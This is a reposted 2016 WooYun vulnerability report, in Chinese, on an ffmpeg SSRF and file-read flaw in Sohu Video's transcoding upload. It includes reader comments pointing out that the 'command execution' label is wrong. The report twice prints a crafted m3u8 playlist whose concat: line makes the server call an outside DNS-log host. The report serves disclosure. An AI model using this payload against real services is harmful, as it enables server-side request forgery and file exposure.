搜狐视频ffmpeg漏洞可文件读取/SSRF

2017年5月2日17:24:13评论411 views字数 207阅读0分41秒阅读模式

摘要

2016-05-06：细节已通知厂商并且等待厂商处理中
2016-05-06：厂商已经确认，细节仅向厂商公开
2016-05-16：细节向核心白帽子及相关领域专家公开
2016-05-26：细节向普通白帽子公开
2016-06-05：细节向实习白帽子公开
2016-06-20：细节向公众公开

漏洞概要关注数(22) 关注此漏洞

缺陷编号： WooYun-2016-205709

漏洞标题：搜狐视频ffmpeg漏洞可文件读取/SSRF

漏洞作者：荒废的腰子

提交时间： 2016-05-06 16:14

公开时间： 2016-06-20 16:30

漏洞类型：命令执行

危害等级：高

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：远程命令执行

4人收藏

漏洞详情

披露状态：

简要描述：

ffmpeg

详细说明：

1.上传视频处，开始转码

2.payload

code 区域

#EXTM3U
 #EXT-X-MEDIA-SEQUENCE:0
 #EXTINF:10.0,
 concat:http://aaa00e.dnslog.info
 #EXT-X-ENDLIST

3.cloudeye返回请求

漏洞证明：

1.上传视频处，开始转码

2.payload

code 区域

#EXTM3U
 #EXT-X-MEDIA-SEQUENCE:0
 #EXTINF:10.0,
 concat:http://aaa00e.dnslog.info
 #EXT-X-ENDLIST

3.cloudeye返回请求

修复方案：

升级

版权声明：转载请注明来源荒废的腰子@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-05-06 16:22

厂商回复：

感谢支持

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-06 16:21 | mango ( 核心白帽子 | Rank:2185 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

0

新姿势么~~怎么命令执行呢~

1# 回复此人
2016-05-06 16:23 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

0

新姿势么~~怎么命令执行呢~

2# 回复此人
2016-05-06 16:27 | kEvin1986 ( 普通白帽子 | Rank:102 漏洞数:6 | $ ? #)

0

http://seclists.org/oss-sec/2016/q1/85 不是命令执行

3# 回复此人
2016-05-06 16:28 | mango ( 核心白帽子 | Rank:2185 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

0

我凑！！标题党该打！！

4# 回复此人
2016-05-06 16:41 | 荒废的腰子 ( 普通白帽子 | Rank:264 漏洞数:31 | bug is my best friend)

0

@mango 复制了之前的问题标题。。。

5# 回复此人
2016-05-07 22:39 | Fire ant ( 普通白帽子 | Rank:108 漏洞数:35 | 他们回来了................)

0

大师傅速度真快

6# 回复此人

漏洞概要 关注数(22) 关注此漏洞

缺陷编号： WooYun-2016-205709

漏洞标题： 搜狐视频ffmpeg漏洞可文件读取/SSRF

相关厂商： 搜狐

漏洞作者： 荒废的腰子